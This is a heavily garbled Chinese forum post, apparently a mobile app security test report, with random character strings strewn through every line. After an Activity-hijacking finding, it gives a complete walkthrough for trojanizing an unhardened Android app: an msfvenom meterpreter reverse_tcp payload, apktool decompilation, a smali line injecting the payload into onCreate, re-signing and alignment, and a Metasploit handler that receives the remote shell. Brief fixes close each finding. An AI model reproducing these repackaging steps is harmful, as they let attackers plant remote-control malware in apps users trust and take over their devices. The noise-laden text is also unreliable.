. O! d1 v) g( S3 u 7 Z7 F6 ~, A& v$ e1 M; g& V- S; s4 O 1-2 测试结果 $ O" f [; k; V; D( Y7 Y * V' A, H9 x: G6 W2 {- f. {" ]# t

: f' P$ ?4 s( h H& W/ R$ e4 B / k+ ^* e8 x* c L9 B- D$ K) q: _

% |; P& M! ~* ?$ h( m; p) H% K+ \ 4 X, K" a+ Z6 h/ t3 U   " N4 V' K" x2 ~# u# v4 U. Q % _& k/ y1 `. z6 a2 w) X

" S3 Y, V* u+ k7 ~ 3 M! s! l% J* \2 h2 H" ~

$ t4 o( L0 D1 w) n8 M: Y, x( b ' }- i: [# W4 v 2 检测结果                    7 v8 `0 B/ d$ Z7 t$ k ) X+ ^$ L) ^1 X, D" i

: ~) U2 j1 w1 }2 F8 K. R 9 n4 r% v4 o- q' j3 B1 }( M

2 k m) _9 l$ k v j/ @6 d 0 c( a _0 ^9 G S 2.1 某某某 8 M) i5 \/ d4 X' ?# B" K9 W9 @( w" Q) B

8 ~4 [: ]+ T) e F, K ! e8 w9 M- D3 }" y

( [ l$ m: i1 B2 R- P3 P6 ~$ G- [4 h' S2 \/ L 2.1.1检测目标 9 b6 Y3 r1 |9 j3 Q " n7 G$ u, t' X# u9 [

( P5 ~% R" O0 {) W% k6 I 9 e8 [7 N& F, U1 f2 L: }3 m

6 B* G8 p3 S' f/ f+ M! k: k * L6 T t! m0 t" u+ \ 目标地址: 某某某某某某APP 9 g3 f3 ~( i+ X ; q, K0 z: P3 ^' [2 Y+ h

. g* J2 C) Z0 R$ }' n* g6 Z9 v- f5 ~% v. L( V# V1 @" h

" d0 Y+ ^) ?0 k [; s" L3 \- h8 u+ ~3 C C2 F1 K 2.1.2检测结果 ; w% V7 Q2 V5 w9 {3 B* Y4 @# y% I: w9 J) k

+ U* `4 f# T2 @$ y* g/ |4 t W" ^# O' n

6 w& c! ?" C( i8 K S* o1 E/ }4 P! U4 I4 j* R 2.1.2.1 0 R- J' E5 `# `3 X% M1 ]6 @7 f9 N ( Y9 e& \3 A# t C3 [3 ]

) _1 r, R& ]2 ^4 e3 g" u' n5 @% Z7 D

) ?1 y. b# Z) H" \! p# \ , u3 _- b" v# g, v& d# m% k 漏洞链接地址:某某某某某某APP " Q2 n) t+ D, E, r" O ! H" _5 T$ k3 ]' n

" z7 f9 g% g, W) q$ w& W9 e# Q 8 E8 T/ [( _; t+ a* K2 I: h

* f k D- P5 a# G( _ : c, k6 Q+ M+ q, e; Q   3 W5 v$ t1 b' O& Y* O* F % g0 ^8 Z4 P+ n$ o

, e- c% w* Y- |7 F6 ^5 r- ~ `- J& x / f% q" M/ i# h& q

& ~+ p) _- K. t m! H. C" Q % Y6 R' ]' w: W* M* d3 ? 漏洞分析及取证: 7 N+ `' {/ ]2 X3 z) u# [" z 8 ?4 B9 O1 `8 Z' T& T$ e7 r

7 |; d( f9 F# j, C$ R( o+ A 7 B2 z, b2 o2 g* a

4 E" Q% g. z! J1 J3 J8 n/ ~$ Z; E4 `' U; x3 T5 v. A' j                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 8 R1 q1 d' t' S" A) M5 n" b 5 F j5 w ?) a7 L" k+ [8 V) v

e; l5 f8 H) c2 ~9 Y) ~ o. z) H" H) z/ s1 @+ c6 H

% E1 u6 N3 J! W. K8 p T / P; z* U0 l0 l, N: x      : ]; t3 f ]9 D: S5 P* u( { S , u) A8 f; C. q( W

2 Q9 Z( {* ^; y) }2 P& D b5 h5 F. P& n7 U3 ~

7 E; ~" i- y- K r _) ]" s " i# C3 i, _* e4 H7 }' i                       K- _ V8 c" k' N8 ?- a$ ~ ^ g2 w- v

" i5 y! a' N$ Z; b2 h0 c& {& _) C) Q# o

. h: @. b' m& O7 u5 e3 u% N, ]9 c* Q ; ^. N0 n3 d( I9 `# z9 q $ P1 w R: r/ k! Q% @( [" D & C7 t! V5 _: t2 Q$ t2 W! y

( x) J4 L3 y* }9 Z! J4 o* R2 [" W `1 V3 h. _( v

N- _' H5 K4 s" F/ {$ A- [- Q. j! D+ F+ S6 L* H5 s5 i1 E B3 `* j7 N. }. {7 G1 i) \1 M6 N" t! E# f7 |% l1 o4 W

$ A6 A& h: [0 i' C1 r' w # H, A ]9 `/ ~" R7 `2 s

) H- M& \' h, J# o8 K ( u6 c0 _% _2 i" h. Z; \9 c / Z8 R& B) P) o; W! l; }1 |+ u / N" r4 I) n5 U3 n5 i$ f! _

0 H# q5 a; Z4 ^1 R. [ 0 x/ B& \! J$ c, F

* A& h R$ e' C7 r6 Q* V, U4 B. u8 q( c9 [ 漏洞危害:高 4 z1 Y- Y% {) s3 Y1 |$ f0 v( h 8 v0 J, h+ G2 A4 Y( v: m5 G) n' I

t1 B/ W8 `# X8 x. Q% P y3 h6 |) Y" v7 U# n! s
; u7 v V- p; `, i+ O & E: _* @/ V, ]3 c # Y/ R8 `' Y) U! n6 O1 c" ?# h' a( }' _( D) F& X3 Z2 b# d$ j2 N8 z7 p& B6 I( @" k7 a& o& T5 ]% Z% ?$ R; V+ _ U; l* [/ V* q* H" A; N# {6 [3 l' ~/ a7 ?) U$ k: T8 Q) ~" S/ ]+ y% P0 E" `' h1 H2 o$ D' N! x+ L% B# q( |' y2 K$ s4 ~4 B& G/ ~+ Y" c3 U% j" V9 M5 z. K: e/ I4 b x8 e- m9 h. n- F: z3 U+ @9 D% i! C) N8 O9 m# a( g. V) J$ I# x6 K2 W8 i& Y: x% C: W. |& M( [5 n* ]% c2 Y4 T% i- A T1 A5 A0 J% w& }2 h0 M/ m4 K' D! {- c9 r% d) z: x/ {" j4 E* {/ j- L7 i$ m: q: X5 E1 _3 l( D2 p9 v, N9 a# g n$ f8 l& B [, U4 u. W6 l5 t. U! K4 k! ?( y) j5 D+ i L# D0 z( f. G8 U# y& P- W3 c" N8 ]
: v- ]- Y0 c2 }$ G7 R: ] ) S C- f% ^ ?

$ R9 a* x8 t* p5 t5 @" d . ] c1 R0 ~5 ]; ~0 W3 M2 B 严重程度 ; A4 x1 o+ l" z5 ^) S8 e( G5 {3 M6 y W1 h4 w

! R( T% ?) i& n; Z6 n $ i1 u+ p b- n( ]5 M7 v
9 a) G2 E, E8 W( j* g: ] Q% x7 ]2 w/ ]% }) c! k8 q, w

' T6 X& E/ l O R! _# J( g0 j1 {% N, R- ^$ H& X F: i 0 t. m+ z! P$ a + O2 t; l% `2 f* f

2 n# G2 Z* S" ` a8 t6 ~ 1 y: g; S) s5 B# M
' R4 P( b! S5 x0 X: g5 S * D" G5 J8 Q! F! I, b! k$ k

: {, W4 y. R% n" b4 ? - d* {) J5 o: o1 \ j, g& } 3 a1 u& B8 U& w: u1 o! Y5 D, L! l; g% k& t; C L

9 B( `* l8 h- f! G 6 |. e( h. _$ \. [' t* H
- P6 `9 ]) k4 S ( K! r3 I& a# O _* h: G

9 n/ X. r; T7 U$ I. T) L& o7 b : \3 t! [& C- A % {9 }" Q, m5 S5 p4 x% f$ d 4 V" {( _" W/ L8 F, U6 x: N

1 l7 ^* a. l$ A+ a0 Y2 L # c) Q' [, l3 M: c8 J0 U( f# J
J2 ~9 a, c; @4 r * z1 \% E, a$ L* o0 p! n

* {( w# a1 w7 m0 D0 F ; }' s$ w) [/ b' a3 x   ' V$ R, h$ ~$ u 6 E( V, E7 N5 ]* `* ?$ y6 o

. W$ A& z" c! g5 v3 R1 C# v% q 7 V# z- d4 r2 w! e5 v
# s- K5 K1 B! W 0 q0 f& k3 L9 N

+ ]9 I7 d1 B! [0 ^ $ Z* m0 z7 x7 m. X , D$ t9 ^4 ?# v. `$ Q. w. ], T" q2 U8 g4 o5 Y6 B

4 a2 O8 A. T | * {' W8 I* ~9 B- t' p" T
' @/ t1 k0 _( |, D8 T6 e $ B9 E/ w2 i$ }5 E

* M; Y8 N/ z& g6 a+ l5 l % s5 p0 q5 ]& ^, b   ' T: f; f) y- r f" x/ ^- Z- K0 x( T. O / B. s) f' |/ j

1 o% R8 B' v* _* t# Z% v7 p* K7 g! Y6 c: G( g, F
/ O0 ~. `) x# } q# p ; ^* Y0 _9 G3 L/ ]
F6 e3 H( P# x' h ; v& F9 s" n# n

; n2 E2 H& J0 o2 W: h 3 @" ?; x R/ S5 P. d   + h S4 f: N, `3 @) } 1 P7 v* P+ a) y6 v

" \ L' e4 s6 |% [; `* t$ n( d " e. f5 I8 r1 U2 E

W" D9 v; X# x. R 9 L) P$ n% p6 ]) b% f 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 1 V* b: w* P% A8 U7 ?" ]8 F , X* I& r, w- K: X* E

7 I6 P3 x7 I; m% b% V3 v ( G5 v0 E# L" V! u. r3 P

5 q; V7 }' K( W2 f# V: G # |, T7 w: G: g5 `/ ~           4 S4 j' r4 W3 y# G L# W; D/ z) f) D 5 N6 M6 J, j9 o" L/ q. ~

: j, P! _$ L! N3 \* G3 Q; R- a! ~ ' Z( m0 J+ S4 e& M7 _

* [# F- E- o5 Z$ r0 l5 s 1 j3 t! i/ {- K( e$ P   1 u! s9 {- |& U8 |1 N- R; l0 W, d0 o& x. @3 h5 [4 s2 I+ \7 {

! K* u$ r" F" `5 g* ]% K " y+ i- g4 }7 P6 n+ Y5 o* r% }0 O

5 k- G; K+ k' \ 0 b; P5 Z3 _# a5 @. T2 J- }6 k 2.1.2.2 & ?: n7 W! P4 @. |% N3 r! X * ]+ t$ k/ v3 Q0 h

: O7 o5 ?( p% f# }) S! R0 o, K 0 Q- F/ N) S/ s# G& k( j. ~/ h

5 l/ N3 T" w1 L% i X 0 q9 }1 i- n) E 漏洞链接地址:某某某某某某APP ; \' E9 H+ W3 B2 g$ t8 p) ^ 8 `$ P# Y% R6 I! U" Z# W; S

' {% h5 v# U B# g2 P% q# U+ u2 c) j- Y a

4 w) y$ ?$ F7 y- ~% j/ j& B& l$ s Y, j z; z; p6 K 漏洞分析及取证: + t- [% E* R8 r# D6 } , f* T4 J5 `1 f

: I- X6 H3 c( P$ y& ]( ?0 ~ 8 ^( g2 x& j7 o- F

0 G' r0 l* F5 `' } B1 Y/ O% r8 T# [                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ' j) J& w6 R5 Y- x* }7 q : G+ _# ]' D0 Z# s+ g& F/ V

/ v0 A& u( ~% I* D; k' k. A, V$ l8 X6 ~

. ?* I/ U) a2 q" O V, T ^ / H( Q/ I9 V3 B3 o, k3 f Metasploit 生成木马 apk ) ^) e( J* ?# `6 M! k Q$ _. L4 E2 V. A% N) g5 A

' d+ a. i8 K, h: M- \( M& K' \ % _. ~; t1 r% ^$ d, n7 D1 s

+ s" a2 @7 @* @* |, C- Y1 s1 Q5 V6 o4 c* ~& O( W% I msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 9 q. A- ]0 {9 o: p: Y2 b2 z" @. K ; i% `" J o! B! C6 M% S

6 E4 N: t7 q, D8 g4 }& M1 v1 N* m9 L* Y3 a

2 \7 t3 m! x% o+ ^( M / h) j- ]% N7 n/ u6 \8 @/ m7 x 反编译目标apk和木马apk % P) ~" A) X5 L* p 1 ^. P1 Q* f* U- h) J1 a; M3 G

, b. {6 f( i* k 8 g* f: I' x8 U2 g. I/ G

+ C$ ^. C5 H A3 B$ ^ 3 N1 A5 r2 m9 J1 S; J8 \ apktool d target.apk
$ e: `$ r% u+ `7 A0 P 4 s) S7 m3 |6 h, m& h apktool d cockhorse.apk
' F; g f' ^6 u1 ]% S& l( u + O; O8 e5 z/ h' _! j; S8 C

3 ?! w0 R/ A5 n- u- S% s3 x# t # I1 L2 c; K7 L+ {% d x

! O P( A' G! V# h$ j `$ [" a" b & o, d/ Y3 P8 K! h' f1 v 木马 apk 注入目标 apk 6 X" K. L* z& p; s2 x& w4 _! _* A J9 Y9 ~0 Y9 u

5 L5 A) _3 m% {9 @ / c9 [$ u8 x9 w# g+ z5 f1 _

+ X3 b& q; Z8 _) m 9 {- q( W1 Y# S" i 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
" E3 N) u7 r/ ^# E2 c ( R5 P9 }) j/ V* _- p: u invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
9 W+ g* ^2 Z; a% B* x 4 y! u8 N5 I& k. v' Y

9 ~/ V' @) F; M. M/ c! l5 H ) ~( u2 q; C) @6 a/ L

) G& B+ p I' ]5 I3 v7 R# F0 ]' M : h7 C) f# Q# U" w+ c! b$ i; a" J& [ 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 1 c$ V% Q# g3 i $ U: r! X2 N) ?6 [, p* q* Y

. ^" t- d/ k8 f2 S) I5 ^0 V- y0 X J . Y2 R/ K% [9 [. F; h/ I4 b

# c. }$ b" k3 F8 { ! ^8 ~) e1 v( T6 Y: q* N/ z 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ - M P9 K7 Q, I- S0 B- _0 [, U* v" v! d- M" @

$ n% r. u0 o) F7 Y: V* K: |0 z% O( u 6 X! u5 M5 T5 y0 X2 M* r

0 N# i1 }6 S; E. I, r - T4 R' T7 K& {; g, z* u- U" D 回编译生成最终 apk & Q ] u& S+ R7 o 3 b- d& k3 w$ z7 k

T$ K, n) T) Q1 r' a 2 h5 c1 `* X$ X1 r3 I5 h' s

, l: @! J$ P; g& n8 T 1 L$ n* h) x8 g; o. E2 f 重新打包 ' L9 H$ |1 ^1 g9 w7 l7 {3 _$ L [0 [1 m

6 `! j. Z, P0 h1 W' a& k) Y- b 2 F6 q: i6 E* l8 p/ ]6 ~

& }& M. L. M" n" |* Q2 {( i( } # X5 T u& P+ v/ R) N apktool b -o repackage.apk target_app_floder / L2 X+ S7 ^# i/ u, e4 E, C D) n- N0 D A9 y9 D6 ~, E0 ~& L. r

8 d# t! S, k& i: r) u% S/ z8 ^1 q # l, O' O# }$ \8 p% y1 ^/ z' J

$ h2 C2 y3 Z7 t9 U& b6 q2 v - l9 }0 k# ~, p, p/ p. V' { 创建签名文件,有的话可忽略此步骤 % i: h: B j- B9 Z: P2 Z- R * K: \3 c! i% _) d! y

7 T4 Q- I. Z0 z& N& ]* e$ Z; W3 ? U2 I% ]

/ Q0 a2 g3 w2 z2 t& `7 }: N 3 Q) F. u9 ?! y; s7 k& A keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ! u9 c. }0 n1 c5 k ) u; c8 |# h3 H: [

8 ~/ N" p# R% M( } 0 F7 }, o% P9 W0 M; A4 f+ N

, ~' ]5 g9 O0 j3 W 6 Z& t r- q' o4 ^( v/ N+ X 签名,以下任选其一 0 F/ E- Y1 D# i# h% [ 8 S: I4 j [2 u; H. i; G

7 p- a. A" f( Z: g8 y 6 A+ `& m- @4 d

+ ~: @2 x0 l, P' E8 D% Q+ U @4 C) d9 }0 d9 M jarsigner 方式 * ^! t; k" E8 b 3 S5 h) H% L$ {5 ^! z( a" M6 G2 j, A" }

, ~' y, `3 Q4 a6 ~$ e8 ^* n1 Z$ E. @1 b4 D: g ~

! S9 ^& | U- N0 Q0 F + Y6 L' B( V7 u jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 5 D, U( M. Z/ ~5 _& X+ _ 9 E$ e. p6 {: w1 T

! V3 L) G/ c4 C - ]; L; p; R. A8 Z( J7 M

8 @3 m4 ^* a6 Q$ P3 b% k# w9 G) k 5 C1 ]/ E0 S7 q# o apksigner 方式 ' _" j t% h6 m: J $ ]2 j) E- y/ d# S

* Z; |3 J0 }* l0 e- g) p* @ 6 e" q# x/ d* K" j8 ?3 z

, w% W) \; k }5 r3 b7 _ % [# S' x: m9 a; T apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ) z& k1 S: q. i/ \% T, t6 j - \1 k; |* w6 K6 {

3 ]% |0 D5 Z0 f& o. s) m; p% R 7 O8 h3 y0 k6 _) Q# E8 s) K

y" E, d) I. c4 _- i/ l8 Z. S8 V4 | 2 e# K2 \- R( F2 p3 i3 Q) R/ L 如需要禁用 v2签名 添加选项--v2-signing-enabled false ' Z- o7 h* F! v# w( J: ?+ M6 ]3 V8 P+ I/ ]% M( B' P* ]2 V

- o$ v! n+ P) E ! V- U/ B" x7 R4 c

( y3 \/ m: q; o9 L: Y 7 f- H9 `% J( | 验证,以下任选其一 7 @/ Q) ?! z: Y; |/ r/ i& @; y9 H! }$ P: ~& S/ |

4 u' G5 V+ s6 b# L. a6 \ 4 m$ G* ?. H, Y7 ^$ x. |+ c

( g6 C) A/ W2 p9 R6 s0 h$ i/ M- Q 8 N8 F5 }; y! K# z, j& o8 F0 w jarsigner方式 $ L5 S% B" B" g( w7 X8 i: t ( T9 b6 D! j( U9 ?. z) h

% k2 J1 D! W1 e- j$ ^$ z' v $ K. C8 \. z4 s+ m

" A `2 n5 k) c2 Q! c: L . z/ ?" m6 q1 _1 x9 M jarsigner -verify repackaged.apk + B2 B. {% s, j! z3 L3 j9 F8 U2 @7 U* v" c; { g0 I

* Q" O0 |! p- @8 _& P8 \( m0 F# ?+ n. U8 {; o0 v6 J

8 c5 z; a8 b# }! f I9 s4 X. r+ F( A: { apksigner 方式 & V1 j; v. a, Q7 v( @ ; m" e- e: z. o) D; u* K

3 t* }/ T) I Y' _# ] / B, ]$ N) j( Z- c7 c

& q9 M8 m U9 K- Y. Y ! G v I2 O, E( R; |" C apksigner verify -v --print-certs repackaged.apk * I8 [& R* y+ O; G. W7 K% N/ T) a$ p4 w 0 V' N, j9 ~4 x4 ^8 z0 @8 q5 a

5 c4 `* {# U$ _$ r z* O* k, O* ^; s) D8 V2 m7 {: S

! N' t) w3 z" E) P/ e+ u' o $ K" }8 d+ P4 ] keytool方式 8 E" {. S+ c4 l, g( p# D 0 L' v0 n# `( d% q8 ~; y

# s* T1 w+ \# L E( w , y& m9 S& r8 y4 V# f

0 @+ e8 K# j+ c1 {, V: T! _9 L 9 u6 X7 i, L" ? keytool -printcert -jarfile repackaged.apk ! u0 o* ~! F% ]$ U& r1 X4 {5 x2 | ( S8 Y( D3 n; K

' H: `& |: `7 ]4 n0 p) e , ^' Z& R7 T( @( k% F: O

/ A- d" B2 }* \; b- {# a2 R) q. }& y 对齐 " b7 x6 v6 t% H/ Q! y8 E: ~% ]/ J3 \# l& ]- m9 b/ J+ ~- U

8 S( W- i5 I6 j0 |# J1 S ) }& V' j7 t8 A1 f2 @

% B1 N' N \' ?, g ! c* R( ?( P; H4 c 字节对齐优化 % ]$ v6 N- Z( @6 `7 q% r5 {! d/ Z4 R9 Q& u

5 ?2 P4 ?$ F: Q3 [ ! s( i( k/ U; ~' D

- m& k4 M/ p, R) y 0 v( ^( _* B/ s( z4 R zipalign -v 4 repackaged.apk final.apk 2 [! v% D5 Y0 h1 ?: q* m# F2 J; g2 Z9 q/ B8 y

+ @ Z. J. n$ B- A, F, |0 a& N# i4 j+ a

6 _- ~. O" l5 k5 E) O6 ]. ? " A) v9 ?% p9 L! \* c) Q 检查是否对齐 9 o0 Z9 i; h* @2 e 7 h( Y5 R% O2 k+ ^1 N

: G/ m- o" U! b% V : ]7 {3 ~" w, _! N: p

. i# ]! I- i/ @- y( E7 \ ! i: b- D9 D* e zipalign -c -v 4 final.apk % L7 r1 Z9 v1 S; f5 F5 d + ?# L5 G* _1 Q7 U0 `7 E1 d% [

* E9 E; C2 _8 X% h; o. q. A: I* V v' Q* c

$ z5 }; k2 O% f4 @) _& v7 T 2 a" o0 t( i. h% H9 z( i 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 9 _) P3 Q1 ~: V# M$ e: {9 J9 k. W . d0 k8 _. I+ x1 u# z: \

" P, W2 e9 r3 e" o 1 K5 N$ G9 U( I8 {4 z

: U/ E0 k7 |- ~5 `2 Q! W1 o; K 2 _0 H& Z. s% P$ R( i/ G 启动Metasploit控制台,配置参数等待上线 4 x5 B' Q% `' O. C5 e+ p* j9 Y4 w! f

1 a$ s$ z& @+ g2 F / I8 e7 q% @. p' [0 r, o- X

. D3 k T; w$ A; y5 P) F0 }! v5 s& a. _( m, B$ f0 @+ l 在终端依次输入如下命令 Y" {" }* w) V+ L5 Z# a/ { / J( W1 C) c4 y; a

8 F z7 @# c4 _1 \, z; u) b3 n, w# c! y* f( I- t

* a9 r" t2 s% i! g V1 Q# M; ? 8 Q9 A; D9 d* z5 B msfconsole % k w* Q0 G6 k8 w% S" x# Y0 q X* Z' d: k! W1 x

3 v4 l2 @; l2 ~0 y5 z$ P 8 c8 H( q/ S6 k( r' ~6 _* ^2 N R

& C( H! [( t& K( Z" g* q7 @4 v 4 Z# C! h, b8 c) P$ M6 E3 A2 ~( e use exploit/multi/handler + v" u5 q( v1 Y% z4 E4 M8 O0 r $ H u7 v/ D) k3 M. z2 M

) t. V- w: U& D4 \( J0 C 4 P- R- `$ I g S+ @

3 R& A" e1 g: R1 B6 D * X4 e3 V7 E) S. ~ set PAYLOAD android/meterpreter/reverse_tcp ' v0 a1 S+ W) |5 T& [ 9 D/ f( y- ]; G9 S+ g

7 \ {0 h: u) c: A7 m/ Y 7 x" o" B& s( v1 c6 Z- h4 m+ i. _

' f% f( \6 x1 V7 w4 }' t1 n( ^3 M ( f& S. f, J d% N: E4 o$ S set LHOST 192.xxx.xx.xx ) y: S; X" U, R7 h4 e3 E' b8 F" c9 J: S

+ X/ o2 s# C. k ' a x1 m1 }2 Z

- C! F2 ?4 `. I3 o& H9 b ) O: |: v+ |: H P6 C set LPORT 4444 : X2 J: _, U2 p3 O8 G 7 }; Z" ?, T, F* e, X' p/ ?

3 v+ d) y/ m$ g' |! v , }6 ~ X5 o6 s4 E+ t# a

8 |7 k, {' m5 C9 C " W8 o9 P% l: J8 E' }: A exploit 8 F" S- p7 c' k1 q' q B7 X # v& n4 P6 ?4 [2 i( h1 C# T8 ]

& t, V' g" H$ O6 n7 {! y 7 N. N1 }/ F9 f) y* o/ B' j

- A4 k( X: \$ w, i# I8 U ! `0 k0 B' C9 q( q; O# `2 X 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               1 Z7 a6 D$ f% ^9 F7 R9 Z! M , J8 z5 i- @$ |$ O# V; m, g

% K. F# d; l) e+ z: J* B) w Q' h Y5 @, w( j% P

d! T. H/ c3 e( w; L " A3 q* c4 `$ o7 ]3 b 漏洞危害:中 7 s, D6 o; s8 c5 G8 @1 u9 x2 ^: o* l5 `9 f

7 Z9 K+ m* K, S3 @( H) k c5 a" u$ p. @! F" e. k% \4 e5 f
, ?6 C. |& C4 R, [" w9 C) {& l 0 E+ }4 [& [2 r4 T % j# ^/ F/ y. u+ f3 m# W# P+ ]6 G" } e% T / B+ L' N0 Q# r) o# O4 w% _8 v( f! k. w! }$ O5 e, p1 |2 d3 P6 C6 U4 d+ ?) T9 Q: b) v# y3 X3 p. }* H" e4 ?) P7 X$ Z* c. s+ ~3 i. N; g" [' a' p" u9 Q* a/ n s C! n0 Z/ q6 N3 Q/ A: }- t* P2 |5 w' ~- \" M, X( @" D- T) r" Z$ k$ T, x9 I# L0 d$ O1 E% N. L% V; @/ R1 l1 F# @3 w. g5 g1 J$ V3 _! x: p n. m/ ?. ?' g+ Z% L( X+ q! L9 }7 A# o$ R$ |: p6 {# f: {& ]- W1 o# U' C7 Y9 _. @ G( c- p- V9 B( ]: X0 y) d+ g! W6 q6 c9 l9 t0 j# O; w" `4 ~* B0 C; ]& t: G* g. Q' A- A# v) k' Z) d+ \( K5 Z% r/ I6 w' L+ H, |. A6 f' o& d9 h' t1 }7 b- }2 r& C2 k6 v$ Q3 O. E; p8 y5 O; M: H8 A' ~ b3 Z( [! r+ b( }5 H4 n# W
, _' y9 T/ j0 K, O8 ]: N ) ~" I' L* ]4 [' E6 j

7 K8 r6 C. J6 P8 ~9 A+ J0 {' V3 l7 m' ?) w6 Z9 V( ] 严重程度 n3 o: a5 q k- I 6 E2 m+ _. O6 u5 S

+ t+ P, D& T1 S: e0 l& M7 ^ ' H4 ^8 g. h" Y( k0 P3 B1 j0 C
0 G8 l) `& H" z% @ ! S1 ?0 H2 s0 i5 K2 Z- T! c5 H ~

1 H @/ }! S5 x9 g0 u, Q% ` $ ?$ _9 E2 _8 \. E$ h6 u4 a 8 B8 e0 e7 X2 \' B+ H1 A. s7 ` + G" f9 i5 {% ]* A

2 K' n* {# `4 j% U5 }1 D9 L ( h. R) Q6 o9 e' H& z9 R
: D# v; o. [- J- u 4 V0 E+ M' X+ X) q( J& Y- O/ K

h, m' g2 \; ^9 N, Z5 m; d1 T ( k0 U8 D! p, T9 x 2 s% U& y$ I8 l7 J; D ( `8 Z2 y! z o+ C0 N z) W

3 L3 t9 g0 a; r% ~# m& m# U |% c( A( j# k/ X! ~/ t' z. J
8 O% X5 _* U$ M/ j4 ?' x3 v" { * ~# b. v" n+ J' t# ~2 x5 ?" c, K

- C- ?9 e% v w. |8 E5 B. A0 Q0 k8 n6 E : X3 \! f) Y8 q- t : v' ] ]' N7 O) T7 t: X- k* x' T

( o4 w, M+ Z M$ W7 f0 m! ? $ Y1 `- s1 e' k m5 X1 Q
; P# P y" ?1 t! f" G % o& {0 R: d% h' J+ V ' q' Q2 l8 b% y. i, z8 \ , J7 b1 }- C' o) ~$ k0 [

# _4 [7 y/ U* g, c ( c- X! h$ v. a6 t( {   4 q- f W& H+ K0 Z+ ^5 b ( g: x; p. J+ ~7 R' v6 D/ _2 |

* i1 r/ q4 c& w3 ? 2 d( E+ V8 C& f s+ T
: u0 E5 \+ a! X ; R: c T" a1 X

3 F9 @* |0 y$ |0 y+ U9 [ & E& Y. U+ s! @: u& a/ g; i. ` % L, U1 _$ j6 L+ s% z 2 q- K/ i( C8 D7 F

* I- R4 ]( ?. N % Q2 d3 j2 V, f7 k
7 `) W9 J K( a) ]; O' I# X! ] ' ~! R. _- f2 t* B7 {3 {4 b# W 7 `# f: E: s! g% s" w, X C5 v) y6 @3 U7 j6 g

" y, X& v7 n1 i5 s' |2 g ! D' N' D" e9 u0 X0 l' o5 x9 `5 k   % v6 A5 ^ \( N9 w' ]$ L4 r6 O 6 K4 ^7 ]. M0 L1 F

$ `! F5 u, i& d1 b! |2 K* j1 {0 {/ m# F' y6 H& c Y
" R! U6 t' b4 }4 X0 b3 W3 X# o. a6 \% L u1 Q2 X1 a1 z
$ j4 V: k7 j8 X& b' } 5 S ~% a7 \8 H9 m( S2 G7 q2 _

, Z6 c7 \0 ~3 k6 y3 i2 p/ i) T1 w3 M   & k( c: m. @) S% ^6 B) L9 i9 f 3 _! K- |, [! f3 \

# R. M$ j8 |9 K7 M& t& m ; X: m# S8 V9 [" C6 D

6 f5 ^6 A* ?0 K# C8 q+ o 4 m4 r3 n& D) l% P 修复方法: x. y2 Y8 T$ x c4 h9 t # C2 Y" l* q+ L5 ^

m" A4 Y. ?1 w% {" P9 J 6 Q6 B* S0 ~& [: o

5 b! w& n7 n! c& U/ O * D3 G' g; ?; k& d. l |$ `               1. APP 启动时应做签名校验防止二次打包。
: C& V% z2 k. y! `4 V6 O- W/ a/ I0 T" R2 d. E R* K 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 + A1 W# F1 F- J$ v8 C; T 9 C0 i- a" ]; S5 x6 q, N

" ?) M$ e7 U" E7 d2 K! T" b! e+ N! ^4 G- n# |$ K. f6 W% g , I' `5 P' v1 {" T/ P* \6 @1 S o2 q

, O& H. g5 ~, b) A+ V # D, x+ b0 o, G* V" u9 O   2 g/ l( y( A$ S* y- k3 k ; D2 F( |9 r# S# G ]) G

k. Y) @/ B; m `# \ . v/ E; c' C- L) p+ X. \ ( `6 w6 K7 T+ X( d 2 H8 {' ?$ y! ^3 R+ p

: X; v) D% k- z9 L5 k" l4 l 7 e& S: [: y" s$ z
5 P' {+ O: L, i( E / P9 s3 q2 W) o) O7 D0 q

/ Y6 G5 g) ?8 t# y$ }4 y+ ^# Y: p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表